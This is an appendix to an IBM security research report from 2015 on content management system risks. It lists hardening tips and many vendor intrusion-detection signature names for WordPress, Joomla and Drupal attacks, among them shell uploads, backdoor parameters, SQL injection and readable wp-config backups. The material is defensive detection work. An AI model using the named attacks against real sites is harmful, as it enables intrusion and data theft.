t r o c m s mss #1 - virtual security operations center · pdf fileresearch and intelligence...

ii

©Copyright IBM Corporation 2014. All rights reserved. IBM and the IBM logo are trademarks or registered trademarks of the IBM Corporation in the United States,

other countries or both. Other company, product or service names may be trademarks or service marks of others.

RESEARCH AND INTELLIGENCE REPORT

RELEASE DATE: FEBRUARY 26, 2015

BY: DAVID MCMILLEN, SENIOR THREAT RESEACHER

IBM MSS THE RISKS OF CONTENT MANAGEMENT SYSTEMS ATTACHMENT #1

iii



TABLE OF CONTENTS

RECOMMENDATIONS/MITIGATION TECHNIQUES ............................................................................................... 1

IDPS SIGNATURES AND/OR SIEM RULES ............................................................................................................................. 1 Akamai .................................................................................................................................................................................... 1 Checkpoint ............................................................................................................................................................................... 1 Cisco ASA ................................................................................................................................................................................. 6 Cisco IDS .................................................................................................................................................................................. 6 Fortinet .................................................................................................................................................................................... 9 IBM ........................................................................................................................................................................................ 16 Intrushield .............................................................................................................................................................................. 18 ISS .......................................................................................................................................................................................... 19 McAfee .................................................................................................................................................................................. 19 Netscreen .............................................................................................................................................................................. 19 Palo Alto ................................................................................................................................................................................ 21 Snort ...................................................................................................................................................................................... 22 Sourcefire............................................................................................................................................................................... 23 Tipping Point ......................................................................................................................................................................... 24 Trendmicro ............................................................................................................................................................................ 25

DISCLAIMER ..................................................................................................................................................... 25

1



RECOMMENDATIONS/MITIGATION TECHNIQUES

Always run the latest version of any CMS.

Update CMS systems regularly. Look specifically for vulnerability patches and bug fixes.

Always use trusted sources for themes and plugins. Never use free themes and plugins.

Never use default settings. Change the default “ADMIN” name. Rename default database prefixes to

prevent SQL Injection.

Reduce credentials. The administrator account should only be needed for performing updates or

adding/changing themes and plugins. Those that are editing posts or writing articles should never need to

be at an administrator level.

Always utilize strong passwords.

Protect the .htaccess file. The following code, added within the .htaccess file will prevent anyone from

reading or writing any files that begin with “hta”. (see “Securing .htaccess” in the References section)

Use a Cloud-Based Security Service. Solutions such as Cloudflare and Akamai act as a shield in front of

your website. These services block bad user agents and offer some protection against SQL Injection and

DDoS attacks.

Backup your CMS installations at regular intervals and design a robust disaster recovery plan.

IDPS SIGNATURES AND/OR SIEM RULES

AKAMAI

Detect Attempts to Access the Wordpress Pingback API

CHECKPOINT

Fast Wordpress Index Changer

Joomla and Wordpress Mass Defacer Tool

W3-Total-Cache Wordpress-plugin Username and Hash Extract

Wordpress Ajax Store Locator Arbitrary File Download

WordPress Backdoor iz Parameter Passthru - Ver2

2



WordPress Complete Gallery Manager Plugin Arbitrary Code Execution - Ver2

Wordpress Download Manager Plugin Arbitrary File Upload

WordPress FancyBox Plugin Code Injection

WordPress Gmedia Gallery Shell Upload

WordPress HTTP Brute Force Login Attempt

WordPress MailPoet Newsletters Unauthenticated File Upload

Wordpress Mini Mail Dashboard Widget Remote File Inclusion

WordPress OptimizePress Theme File Upload Remote Code Execution

WordPress Pingback Distributed Denial of Service

WordPress Plugin AdRotate SQL Injection

WordPress Plugin Google Document Embedder Arbitrary File Disclosure

WordPress RSS Feed Generator self_link HTTP_HOST Cross Site Scripting

WordPress RSS feed Generator self_link HTTP_HOST Cross-Site Scripting

WordPress Slider Revolution Plugin Local File Inclusion

WordPress Symposium Plugin Unauthenticated Shell Upload

Wordpress Timthumb WebShot Vulnerability Code Execution

Wordpress Top Quark Architecture Arbitrary File Upload Code Execution

WordPress VideoWhisper Live Streaming Integration Plugin Unrestricted File Upload

Wordpress W3 Total Cache PHP Code Execution

Joomla and Wordpress Mass Defacer Tool

Joomla Community com_comprofiler SQL Injection

Joomla Component com_5starhotels SQL Injection

Joomla Component com_acooldebate Local File Inclusion

Joomla Component com_acprojects SQL Injection

Joomla Component com_acstartseite SQL Injection

Joomla Component com_acteammember SQL Injection

Joomla Component com_adsmanager Remote File Inclusion

Joomla Component com_ajaxchat Remote File Inclusion

Joomla Component com_alameda SQL Injection

Joomla Component com_artlinks Remote File Inclusion

Joomla Component com_avosbillets SQL Injection

Joomla Component com_beamospetition Remote SQL Injection

Joomla component com_bearleague SQL Injection

Joomla Component com_bfsurvey Local File Inclusion

Joomla Component com_biblestudy Local File Inclusion

Joomla Component com_billyportfolio SQL Injection

Joomla Component com_books SQL Injection

Joomla Component com_brightweblinks SQL Injection

Joomla Component com_cartweberp Local File Inclusion

Joomla Component com_category SQL Injection

3



Joomla Component com_ccnewsletter Local File Inclusion

Joomla Component com_ckforms Local File Inclusion

Joomla Component com_clan SQL Injection

Joomla Component com_clanlist SQL Injection

Joomla Component com_communitypolls Local File Inclusion

Joomla Component com_contact Info SQL Injection

Joomla Component com_content SQL Injection

Joomla Component com_dailymeals Local File Inclusion

Joomla Component com_dashboard Directory Traversal

Joomla Component com_dateconverter SQL Injection

Joomla Component com_dbquery Remote File Inclusion

Joomla Component com_digifolio SQL Injection

Joomla Component com_doqment SQL Injection

Joomla Component com_dshop SQL Injection

Joomla Component com_DTRegister Remote SQL Injection

Joomla Component com_equipment SQL Injection

Joomla Component com_equotes Remote SQL Injection

Joomla component com_estateagent SQL Injection

Joomla Component com_event Multiple vulnerability

Joomla Component com_expshop SQL Injection

Joomla Component com_ezautos SQL Injection

Joomla Component com_ezine Remote File Inclusion

Joomla Component com_ezstore Remote SQL Injection

Joomla component com_fastball SQL Injection

Joomla Component com_flippingBook SQL Injection

Joomla Component com_galeria SQL Injection

Joomla Component com_ganalytics Local File Inclusion

Joomla Component com_gcalendar Remote SQL Injection

Joomla Component com_gigcal SQL Injection

Joomla Component com_gurujibook SQL Injection

Joomla Component com_hmcommunity SQL Injection

Joomla Component com_huruhelpdesk SQL Injection

Joomla Component com_ice SQL Injection

Joomla Component com_idoBlog Remote SQL Injection

Joomla Component com_ignitegallery SQL Injection

Joomla Component com_ijoomla_archive SQL Injection

Joomla Component com_img Local File Inclusion

Joomla Component com_ionfiles File Disclosure

Joomla component com_iproperty SQL Injection

Joomla Component com_jabode Remote SQL Injection

4



Joomla Component com_janews Local File Inclusion

Joomla Component com_jashowcase Remote SQL Injection

Joomla Component com_jbudgetsmagic SQL Injection

Joomla Component com_jeauto Local File Inclusion

Joomla Component com_jeemasms Multiple vulnerability

Joomla Component com_jefaqpro SQL Injection

Joomla Component com_jejob SQL Injection

Joomla Component com_jepoll SQL Injection

Joomla Component com_jequoteform Local File Inclusion

Joomla Component com_jgen SQL Injection

Joomla Component com_Jobline SQL Injection

Joomla Component com_joomlaDate SQL Injection

Joomla Component com_joomlaradio Remote File Inclusion

Joomla Component com_joomnik SQL Injection

Joomla Component com_jotloader SQL Injection

Joomla Component com_jpad SQL Injection

Joomla Component com_jphoto SQL Injection

Joomla Component com_jpodium SQL Injection

Joomla component com_jp_jobs SQL Injection

Joomla Component com_jradio Local File Inclusion

Joomla Component com_jsjobs SQL Injection

Joomla Component com_kochsuite Remote File Inclusion

Joomla Component com_linkdirectory Remote File Inclusion

Joomla Component com_linkr Local File Inclusion

Joomla Component com_listing SQL Injection

Joomla Component com_liveticker SQL Injection

Joomla Component com_lyftenbloggie Remote SQL Injection

Joomla Component com_mambowiki Remote File Inclusion

Joomla Component com_marketplace SQL Injection

Joomla Component com_markt SQL Injection

Joomla Component com_mdigg SQL Injection

Joomla Component com_mojo Remote File Include

Joomla Component com_netinvoice SQL Injection

Joomla Component com_newsflash Remote SQL Injection

Joomla Component com_obSuggest Local File Inclusion

Joomla Component com_otzivi Local File Inclusion

Joomla Component com_ownbiblio SQL Injection

Joomla Component com_oziogallery SQL Injection

Joomla Component com_pccookbook Remote File Inclusion

Joomla Component com_people Local File Inclusion

5



Joomla Component com_performs Remote File Inclusion

Joomla Component com_phocadocumentation Remote SQL Injection

Joomla Component com_phocagallery SQL Injection

Joomla Component com_photoblog alpha 3 SQL Injection

Joomla Component com_photoblog SQL Injection

Joomla component com_ponygallery SQL Injection

Joomla Component com_portfol SQL Injection

Joomla Component com_prayercenter SQL Injection

Joomla Component com_productbook SQL Injection

Joomla Component com_projectfork Local File Inclusion

Joomla Component com_qcontacts SQL Injection

Joomla Component com_quickfaq SQL Injection

Joomla Component com_realestatemanager Remote File Inclusion

Joomla Component com_redshop SQL Injection

Joomla Component com_rokdownloads Local File Inclusion

Joomla Component com_rsappt_pro2 Local File Inclusion

Joomla Component com_rsfiles Directory traversal

Joomla Component com_rwcards Local File Inclusion

Joomla Component com_s5clanroster SQL Injection

Joomla Component com_sectionex Local File Inclusion

Joomla Component com_seminar SQL Injection

Joomla Component com_simpleshop SQL Injection

Joomla Component com_simple_review Injection SQL Injection

Joomla Component com_spidercalendar SQL Injection

Joomla Component com_team SQL Injection

Joomla Component com_techfolio SQL Injection

Joomla Component com_tupinambis SQL Injection

Joomla Component com_virtuemart SQL Injection

Joomla Component com_webring Remote File Inclusion

Joomla Component com_wmtpic SQL Injection

Joomla Component com_xevidmegahd Remote SQL Injection

Joomla Component com_xewebtv SQL Injection

Joomla Component com_xgallery Local File Inclusion

Joomla Component com_xmovie Local File Inclusion

Joomla Component com_ybggal SQL Injection

Joomla Component com_yellowpages SQL Injection

Joomla Component com_youtube SQL Injection

Joomla Component com_yvcomment SQL Injection

Joomla Component ds_syndicate SQL Injection

Joomla Component JE Media Player Arbitrary File Upload

6



Joomla Component jeeventcalendar SQL Injection

Joomla Component JESectionFinder Directory traversal

Joomla Component Jw_allVideos Remote File Download

Joomla Component Scriptegrator File Inclusion

Joomla com_casino_blackjack SQL Injection

Joomla com_joomgalaxy SQL Injection

Joomla com_na_newsdescription SQL Injection

Joomla Content Editor Malicious User Agent Code Execution

Joomla DJ Classifieds SQL Injection

Joomla Media Manager File Upload Code Execution

Joomla ofc_upload_image.php Unrestricted File Upload

Joomla Remote File Inclusion

Joomla Unauthorized File Upload Remote Code Execution

Joomla Webring Component adminwebringdocsphp component_dir Parameter PHP Code Execution - Ver2

Joomla! HTTP-Referrer XSS

Joomla! Jobline Component 'search' Parameter SQL Injection

Joomla! JomSocial Input Validation Remote Code Execution

Joomla! Path Traversal

Web Servers Joomla Remote File Inclusion

Dries Buytaert Drupal Core OpenID Module Information Disclosure

Drupal Core XML-RPC Endpoint xmlrpc.php Internal Entity Expansion Denial of Service

Drupal Core XML-RPC Endpoint xmlrpc.php Tags Denial of Service

CISCO ASA

WordPress Installation Brute Forcing Attempt

WordPress OptimizePress Theme File Upload Vulnerability

Joomla 1.5.12 TinyBrowser File Upload Code Execution

Joomla Media Manager File Upload

CISCO IDS

WordPress Cookie cache_lastpostdate Overflow

HTTP WordPress Colormix Theme Cross Site Scripting Vulnerability

Newsletter Plugin For Wordpress Cross-Site Scripting Vulnerability

NextGEN Gallery Plugin For WordPress Json.php Path Disclosure Vulnerability

Rlswordpresssearch Plugin For Wordpress Register.Php SQL Injection Vulnerability

Snazzy Archives Plugin For Wordpress Tagcloud.Swf Cross-Site Scripting Vulnerability

WordPress 2.1.1 Backdoor IX Parameter Injection Detection

WordPress 2.1.1 Backdoor IZ Parameter Injection Detection

WordPress ABC Test Plugin Id Parameter XSS Vulnerability

7



WordPress Age Verification Plugin Redirect_to Parameter URI Redirection Vulnerability

WordPress Ambience Theme Src Parameter Cross Site Scripting Vulnerability

Wordpress Attack Scanner Plugin For Wordpress Path Information Disclosure Vulnerability

WordPress Bradesco Gateway Plugin Cross Site Scripting Vulnerability

WordPress Caching Plugins Remote PHP Code Execution

WordPress Category Grid View Gallery Plugin ID Parameter Cross-Site Scripting Vulnerability

WordPress Chocolate WP Theme Cross Site Scripting Vulnerability

WordPress Church_Admin Id Parameter XSS Vulnerability

WordPress Ck-processkarma.php Security Bypass Vulnerability

WordPress Ck-processkarma.php SQL Injection Vulnerability

WordPress Comment Extra Fields Plugin Cross Site Scripting Vulnerability

WordPress CommentLuv Plugin _ajax_nonce Parameter Cross-Site Scripting Vulnerability

WordPress Cookie cache_lastpostdate Overflow

WordPress Count Per Day Plugin Counter.php CSRF Vulnerability

WordPress Count Per Day Plugin Datemin Parameter XSS Vulnerability

WordPress Count Per Day Plugin Page Parameter XSS Vulnerability

WordPress Crayon Syntax Highlighter Wp_load Remote File Include

WordPress Cross Site Request Forgery Vulnerability

WordPress Cross Site Scripting Vulnerability

Wordpress Cross-Site Request Forgery

WordPress Denial of Service Vulnerability

WordPress Design Approval System Plugin XSS Vulnerability

WordPress Duplicator Plugin Cross-Site Scripting Vulnerability

WordPress Easy Webinar Plugin Wid Parameter SQL Injection

WordPress FAQs Manager Plugin Admin-ajax.php Cross-Site Scripting Vulnerability

WordPress Featurific For WordPress Plugin Snum Parameter XSS Vulnerability

WordPress Feedweb Plugin Wp_post_id Parameter Cross Site Scripting Vulnerability

WordPress FlagEm Plugin CID Parameter Cross Site Scripting Vulnerability

WordPress Flashnews Theme Src Parameter DoS

WordPress Flashnews Theme Src Parameter Remote Code Execution

WordPress Flashnews Theme Src Parameter XSS Vulnerability

WordPress Flashnews Theme Test.php Parameter XSS Vulnerability

WordPress Floating Tweets Plugin Directory Traversal

WordPress Floating Tweets Plugin Full Path Disclosure

WordPress Floating Tweets XSS Vulnerability

WordPress Foxypress Plugin Cross Site Request Forgery

WordPress Foxypress Plugin HTML Injection

WordPress Foxypress Plugin Information Disclosure

WordPress G-Lock Double Opt-In Manager Plugin SQL Injection

WordPress Gallery Plugin Filename_1 Parameter Remote Arbitrary File Access Vulnerability

8



Wordpress HD Webplayer Plugin Config.php SQL Injection

Wordpress HD Webplayer Plugin Config.php SQL Injection Vulnerability

WordPress Host Header Processing Cross-Site Scripting

WordPress IndiaNIC Cross Site Request Forgery Vulnerability

Wordpress Indianic Faqs Manager Plugin 1.0 XSRF Vulnerability

Wordpress Indianic Faqs Manager Plugin 1.0 XSS Vulnerability

Wordpress InfusionSoft Plugin Upload

WordPress Installation Brute Forcing Attempt

WordPress Integrator Redirect_to Parameter Cross-Site Scripting Vulnerability

WordPress Mb.MiniAudioPlayer Plugin Cross Site Scripting Vulnerability

WordPress Monsters Editor For WP Super Edit Plugin Arbitrary File Upload Vulnerability

WordPress Newsletter Preview.php File Disclosure Vulnerability

WordPress Notices Ticker Plugin Cross Site Request Forgery

WordPress OptimizePress Theme File Upload Vulnerability

WordPress Pinboard Theme Tab Parameter Cross Site Scripting Vulnerability

WordPress Pingback Denial of Service Attack

WordPress Platinum SEO XSS Vulnerability

Wordpress Podpress Plugin Playerid Parameter Cross Site Scripting Vulnerability

WordPress Portable phpMyAdmin Plugin Authentication Bypass

WordPress Pretty Link Plugin XSS Vulnerability

WordPress ProPlayer Plugin Id Parameter SQL Injection

WordPress Rich Widget Plugin Arbitrary File Upload Vulnerability

WordPress RokNewsPager Denial of Service

WordPress RokNewsPager Plugin XSS

WordPress Sahifa Theme Cross Site Request Forgery Vulnerability

WordPress Securimage-WP Plugin Siwp_test.php Cross Site Scripting Vulnerability

WordPress Sharebar Cross Site Scripting Vulnerability

Wordpress Slideshow Plugin Cross Site Scripting Vulnerability

Wordpress Slideshow Plugin Multiple Cross Site Scripting Vulnerability

WordPress Smart Flv Plugin Cross Site Scripting Vulnerability

WordPress SolveMedia 1.1.0 Cross Site Request Forgery

WordPress Spicy Blogroll Plugin Remote File Include Vulnerability

WordPress Spider Catalog Plugin AllImagesQ Cross Site Scripting Vulnerability

WordPress TimThumb Plugin Cross Site Scripting Vulnerability

WordPress Token Manager Plugin Tid Parameter XSS Vulnerability

WordPress Traffic Analyzer Plugin aoid Parameter XSS Vulnerability

WordPress Video Lead Form Plugin ErrMsg Parameter XSS Vulnerability

WordPress Webplayer Plugin ID Parameter SQL Injection

WordPress WP Socializer Val Parameter XSS Vulnerability

WordPress Wp-ImageZoom File Parameter Remote File Disclosure Vulnerability

9



WordPress Wp-ImageZoom Theme ID Parameter SQL Injection

WordPress WP-SendSMS Plugin Cross Site Request Forgery Vulnerability

WordPress WP-Table Reloaded Plugin ID Parameter Cross Site Scripting Vulnerability

WordPress Wysija Newsletters Plugin SQL Injection

Wordpress Zeroclipboard.Swf Cross Site Scripting Vulnerability

Googlemaps Joomla! Pluging Cross-Site Scripting Vulnerability

Googlemaps Plugin For Joomla! Plugin_Googlemap3_Kmlprxy.Php DOS Vulnerability

Joomla 1.5 Password Token Bypass

Joomla 1.5.12 TinyBrowser File Upload Code Execution

Joomla Component JCE File Upload Remote Code Execution

Joomla Cross-Site Scripting Vulnerability

Joomla Media Manager File Upload

Joomla VirtueMart Component SQL Injection

Rsfiles Component For Joomla Cid Parameter SQL Injection Vulnerability

Drupal Core xmlrpc.php Internal Entity Expansion Denial of Service

FORTINET

WordPress.Slider.Revolution.File.Inclusion

Backdoor.WordPress.ix.Code.Execution

Backdoor.WordPress.iz.Command.Execution

Cafe.Wordpress.SQL.Injection

FeedList.Plugin.for.WordPress.Parameter.XSS

FireStats.WordPress.Plugin.Multiple.XSS.Authentication.Bypass

Fuctweb.CapCC.Plugin.For.WordPress.CAPTCHA.Security.Bypass

PHP.phpWordPress.SQL.Injection

PHP.WordPress.Cookie.Data.Code.Injection

Pretty.Link.Lite.WordPress.Plugin.Cross.Site.Scripting.Vuln

Twitter.Feed.for.WordPress.Plugin.XSS.Vulnerability

web_app: PHP.phpWordPress.SQL.Injection

web_app: PHP.phpWordPress.Sql.Injection.A

WordPress.Advance.Dewplayer.Plugin.Information.Disclosure.Vuln

WordPress.All-in-One.Event.Calendar.Plugin.XSS.Vulnerabilities

WordPress.AllWebMenus.Plugin.Remote.File.Inclusion.Vuln

WordPress.Asset.Manager.Plugin.Arbitrary.File.Upload

WordPress.BackWPup.Plugin.Directory.Traversal.Vulnerabilities

WordPress.Booking.System.Plugin.SQL.Injection.Vulnerability

WordPress.Calendar.Plugin.Cross-Site.Request.Forgery.Vuln

WordPress.cformsII.Plugin.rs.and.rsargs.XSS

WordPress.Code.SQL.Injection

10



WordPress.Complete.Gallery.Manager.plugin.Arbitrary.File.Upload

WordPress.Contact.Bank.Plugin.Label.Tag.HTML.Injection.Vuln

WordPress.Content.Slide.Plugin.Cross-site.Request.Forgery.Vulne

WordPress.Contextual.Related.Posts.Plugin.Cross-Site.Vuln

Wordpress.Count-Per-Day.Plugin.Directory.Traversal.Vuln

Wordpress.Count.per.Day.Plugin.Multiple.XSS.Vulns

WordPress.Count.Per.Day.Plugin.XSS

WordPress.Cross-site.Request.Forgery.Vulnerability

WordPress.CSS.Style.Cross-Site.Scripting.Vulnerability

Wordpress.Default.Theme.Admin.XSS

WordPress.Digg-Digg.Plugin.Cross-Site.Request.Forgery.Vuln

Wordpress.Download.Manager.Unauthenticated.File.Upload

WordPress.Download.Manager.wpdm_upload_icons.Code.Execution

WordPress.Fast.Secure.Contact.Form.Plugin.URL.Cross-Site.Script

WordPress.File.Upload.Script.Insertion.Vulnerabilities

Wordpress.Forums.Plugin.File.Disclosure.Vulnerability

WordPress.Foxypress.Plugin.Arbitrary.File.Upload

WordPress.Foxypress.Plugin.Uploadify.Arbitrary.File.Upload

Wordpress.Gallery.Plugin.File.Inclusion.Vulnerability

WordPress.Information.Disclosure

Wordpress.InfusionSoft.Code.Generator.PHP.Code.Injection

Wordpress.is_human.Plugin.Remote.Command.Injection

WordPress.Jetpack.Plugin.Security.Bypass.Vulnerability

WordPress.jRSS.Widget.url.Parameter.Information.Disclosure

WordPress.KSES.Multiple.Cross-site.Scripting.Vulnerabilities

WordPress.LeagueManager.Plugin.SQL.Injection

Wordpress.Login.Brute.Force

Wordpress.Mac.Photo.Gallery.Plugin.Arbitrary.File.Upload

WordPress.Mail.On.Update.Plugin.Cross-Site.Request.Forgery.Vuln

Wordpress.MailPoet.Newsletters.Unauthenticated.File.Upload

WordPress.MailPoet/WYSIJA.Newsletters.Remote.File.Upload.Vuln

WordPress.mb.miniAudioPlayer.Plugin.XSS.Vulnerabilities

WordPress.META-Generator.Header.Indicates.Vulnerable.Version

Wordpress.MM.Forms.Community.Plugin.Arbitrary.File.Upload

WordPress.MobileChief.Plugin.Cross-Site.Scripting.Vulnerability

WordPress.MU.Prior.to.2.7.Cross-site.Scripting.Vuln

WordPress.Multiple.Security.Vulnerabilities

WordPress.Multiple.Themes.Cross-site.Scripting.Vulnerabilities

Wordpress.Multiple.Vulnerabilities

WordPress.myEASYbackup.Plugin.Directory.Traversal.Vulnerability

11



Wordpress.Newsletter.Plugin.Cross-site.Scripting.Vulnerability

WordPress.Newsletter.Preview.php.File.Disclosure

WordPress.Occasions.Plugin.XSS

WordPress.OptimizePress.Theme.Arbitrary.File.Upload

Wordpress.Page-Flip-Image-Gallery.Plugins.Arbitrary.File.Upload

WordPress.Participants.Database.Plugin.SQL.Injection.Vuln

WordPress.Photo.Album.Plus.Error.Log.XSS

Wordpress.PHP.Application.XSS

Wordpress.Pica.Photo.Gallery.Plugin.Arbitrary.File.Upload

WordPress.Platinum.SEO.Pack.Plugin.s.Parameter.XSS.Vuln

WordPress.Plugin.Advanced.Custom.Fields.Remote.File.Inclusion

WordPress.Plugin.BackWPup.Remote.File.Inclusion.Vulnerability

WordPress.Plugin.Comment.Rating.id.Parameter.SQL.Injection

WordPress.Plugin.DZS.Video.Gallery.File.Disclosure

WordPress.Plugin.GDE.Arbitrary.File.Disclosure

WordPress.Plugin.Sniplets.File.Inclusion

WordPress.Plugin.W3.Total.Cache.Remote.PHP.Code.Execution

Wordpress.Poll.Plugin.SQL.Injection.Vulnerability

Wordpress.Portable.PHPmyadmin.Auth.Bypass.Vulnerability

WordPress.post.php.XSS

Wordpress.Posts.SQL.Injection.Vulnerability

WordPress.Privileges.Multiple.Information.Disclosure.Vuln

WordPress.Processing.Embed.Plugin.Cross-site.Scripting.Vuln

WordPress.Property.Plugin.Arbitrary.File.Upload

WordPress.Quick.Page/Post.Redirect.Plugin.Multiple.Vuln

WordPress.Related.Posts.by.Zemanta.Plugin.Cross.Site.Vuln

WordPress.Related.Posts.Plugin.Cross-Site.Request.Vuln

Wordpress.Reset.Password.Security.Bypass

WordPress.RSS.Feed.Generator.self_link.HTTP_HOST.XSS

WordPress.RSS.Feed.Reader.Plugin.Cross-site.Scripting.Vuln

WordPress.RSS.META-Generator.Header.Indicates.Is.Vulnerable

WordPress.S3.Video.Plugin.Cross-Site.Scripting.Vulnerability

WordPress.Safe.Search.Plugin.Cross-site.Scripting.Vulnerability

WordPress.Security.Bypass.And.Unspecified.Vulnerabilities

WordPress.Simply.Poll.Plugin.XSS

WordPress.Slider.Revolution.File.Inclusion

Wordpress.Spicy.Blogroll.Plugin.Remote.File.Inclusion

WordPress.Stream.Video.Player.Plugin.CSRF.Vulnerability

WordPress.template.functions.category.SQL.Injection

WordPress.Theme.Tuner.Plugin.Remote.File.Inclusion.Vuln

12



Wordpress.TimThumb.PHP.Command.Injection

WordPress.TinyMCE.Color.Picker.Plugin.XSS.and.Bypass.Vuln

WordPress.Tinymce.Thumnail.Gallery.Plugin.File.Disclosure

WordPress.Traffic.Analyzer.Plugin.aoid.Parameter.XSS.Vuln

Wordpress.Unauthenticated.Administrator.Password.Reset

Wordpress.User.Enumeration.Brute.Forcer

WordPress.user_login.Column.SQL.Truncation.Vuln

WordPress.wp-admin.and.admin.php.Module.Conf.Security.Bypass

WordPress.wp-config.php.Backup.Is.Readable

WordPress.wp-config.php.NumberSign.Backup.Is.Readable

WordPress.wp-content.plugins.Directory.is.Listable

WordPress.WP-Cumulus.Plugin.tagcloud.swf.XSS

WordPress.WP-Forum.Plugin.Multiple.SQL.Injections

Wordpress.Wp-login.PHP.HTTP.Response.Splitting.Vuln

WordPress.WP-Syntax.Plugin.Remote.Code.Execution

WordPress.WP.Banners.Lite.Plugin.XSS

WordPress.WP.Custom.Pages.Plugin.Directory.Traversal.Vuln

WordPress.Wp.Download.Manager.Arbitrary.File.Upload

WordPress.WP.E.Commerce.Plugin.cart.message.XSS

WordPress.Wp.ImageZoom.file.Parameter.File.Disclosure

Wordpress.WP.Marketplace.Plugin.Arbitrary.File.Upload

WordPress.WP.Symposium.Arbitrary.File.Upload

WordPress.WP.Symposium.Plugin.Cross-site.Scripting.Vuln

Wordpress.wp.trackback.SQL.Injection

WordPress.WP.Ultimate.Email.Marketer.Plugin.Multiple.Vulns

Wordpress.wpStoreCart.Plugin.Arbitrary.File.Upload

Wordpress.wpStoreCart.Plugin.Unrestricted.File.Upload.Vuln

WordPress.Wptitle.XSS

Wordpress.WPTouch.Authenticated.File.Upload

WordPress.WPtouch.Plugin.Cross-site.Scripting.Vulnerability

WordPress.XML-RPC.Remote.Publishing.Interface.Security.Vuln

Wordpress.Xml.Quadratic.Blowup.DoS

WordPress.xmlrpc.php.wp.getUsersBlogs.Brute.Force

WordPress.xmlrpc.Pingback.DoS

WordPress.XSS.HTML.Injection.SQL.Injection

WordPress.XSS.SQL.Injection

WordPress.XSS.Vulnerability

Wordpress_File.Upload

WP-Forum.WordPress.Plugin.Multiple.SQL.Injection

Yoast.Google.Analytics.For.WordPress.Plugin.XSS

13



Acajoom.Component.for.Joomla.3.2.6.Backdoor

Agile.Joomla.Components.Parameter.Local.File.Inclusion

AvReloaded.Plugin.for.Joomla!.SQL.Injection.Vulnerability

EOL.Software.Joomla!.1.5.x.Detected

Huru.Helpdesk.Joomla.Component.cid.Parameter.SQL.Injection.Vuln

Joomla!.1.5.Multiple.Vulnerabilities

Joomla!.1.5.Password.Reset.Vulnerability

Joomla!.1.6.Multiple.Cross-Site.Scripting.Vulnerabilities

Joomla!.1.6.Multiple.Vulnerabilities

Joomla!.administrator.Section.Information.Disclosure.Vuln

Joomla!.AJAX.Shoutbox.Component.jal_lastID.SQL.Injection.Vuln

Joomla!.AlphaRegistration.Component.SQL.Injection

Joomla!.and.Mambo.gigCalendar.Component.SQL.Injection.Vuln

Joomla!.BF.Survey.Pro.Component.SQL.Injection.Vulnerability

Joomla!.Blind.SQL.Injection.Vulnerability

Joomla!.com_contact.Cross-site.Scripting.Vulnerability

Joomla!.com_contact.Multiple.Cross-site.Scripting.Vuln

Joomla!.com_jsjobs.Component.Multiple.SQL.Injection.Vuln

Joomla!.Cross-Site.Scripting.Vulnerability

Joomla!.eXtplorer.Component.Cross-site.Scripting.Vuln

Joomla!.GCalendar.Component.SQL.Injection.Vulnerability

Joomla!.GigCalendar..Component.SQL.Injection.Vulnerability

Joomla!.Google.Maps.Plugin.Multiple.Vulnerabilities

Joomla!.Host.HTTP.Header.Cross.Site.Scripting.Vulnerability

Joomla!.Information.Disclosure.Vulnerability

Joomla!.ja_purity.Cross-site.Scripting.Vulnerability

Joomla!.JA_Purity.Template.XSS.Vulnerability

Joomla!.Jumi.Component.SQL.Injection.Vulnerability

Joomla!.JV.Comment.Component.id.Parameter.SQL.Injection.Vuln

Joomla!.JVideo!.Component.SQL.Injection.Vulnerability

Joomla!.Komento.Component.Multiple.XSS.Vuln

Joomla!.Language.Switcher.Module.Cross-site.Scripting.Vuln

Joomla!.Multi.Calendar.Component.Cross-site.Scripting.Vuln

Joomla!.Multiple.Cross-Site.Scripting.Vulnerabilities

Joomla!.Multiple.Information.Disclosure.Vulnerabilities

Joomla!.ordering.Parameter.Cross-site.Scripting.Vulnerability

Joomla!.Password.Change.and.Privilege.Escalation.Vuln

Joomla!.Prior.to.1.5.12.Multiple.Cross-site.Scripting.Vuln

Joomla!.Prior.to.2.5.5.Multiple.Vulnerabilities

Joomla!.Properties.Component.for.SQL.Injection.Vulnerability

14



Joomla!.remember.php.PHP.Object.Injection.Vulnerability

Joomla!.SQL.Injection.Vulnerability

Joomla!.Unauthorised.Upload.File.Vulnerability

Joomla!.Update.Manager.Cross-site.Scripting.Vulnerability

Joomla!.XStandard.Component.Directory.Traversal.Vulnerability

Joomla!.Youtube.Gallery.Component.videofile.XSS.Vuln

Joomla.Admin.Joomlaradiov5.PHP.File.Inclusion

Joomla.Akeeba.Kickstart.Unserialize.Remote.Code.Execution

Joomla.ArtForms.Multiple.SQL.Injection.Vulnerabilities

Joomla.Barter.Sites.Component.SQL.Injection.Vulnerability

Joomla.BF.Quiz.Component.SQL.Injection.Vulnerability

Joomla.Clickjacking.Security.Bypass.Vulnerability

Joomla.Com.User.Component.Password.Reset

Joomla.Component.RWCards.Remote.SQL.Injection

Joomla.com_jimtawl.Component.Local.File.Include.Vulnerability

Joomla.com_kp.Local.File.Include.Vuln

Joomla.com_maianmedia.Component.SQL.Injection.Vulnerability

Joomla.com_xobbix.component.SQL.Injection.Vuln

Joomla.Cross-site.Scripting.Multiple.Vulnerabilities

Joomla.Currency.Converter.Module.XSS.Vulnerability

Joomla.Estate.Agent.Component.SQL.Injection.Vulnerability

Joomla.Google.Maps.Plugin.DDOS

Joomla.highlight.php.Multiple.Remote.Vulnerabilities

Joomla.JCE.Extension.Remote.File.Upload

Joomla.language.Search.Component.Cross-Site.Scripting.Vuln

Joomla.Lyftenbloggie.XSS.Vulnerability

Joomla.Media.Manager.Arbitrary.File.Upload

Joomla.Multiple.SQL.Injection.Vulnerabilities

Joomla.Multiple.XSS.and.Information.Disclosure.Vulns

Joomla.Prior.to.1.6.4.Multiple.XSS

Joomla.RSfiles.Component.SQL.Injection

Joomla.searchword.Parameter.Process.Code.Injection

Joomla.Teams.Component.SQL.Injection.Vulnerability

Joomla.TinyBrowser.Multiple.Vulnerabilities

Joomla.TinyMCE.Arbitrary.File.Upload

Joomla.Upload.Code.Execution

Joomla.URI.Index.php.XSS

Joomla.Webring.Remote.File.Inclusion

Mambo.Joomla!Multiple.Components.Controller.Para.Local.File

Mambo.Joomla!Multiple.Components.View.Para.Local.File.Inclusion

15



Mambo.Joomla.DoS

Mambo/Joomla!.Remote.File.Inclusion.Vulnerability

Obsolete.Software:.Joomla!.3.0.x.Detected

Obsolete.Software:.Joomla!.3.1.x.Detected

Obsolete.Software:Joomla!.1.7.x.Detected

Scriptegrator.Plugin.for.Joomla.files.Parameter.Remote.File.

TinyBrowser.Joomla.Component.folders.php.Local.File.Inclusion

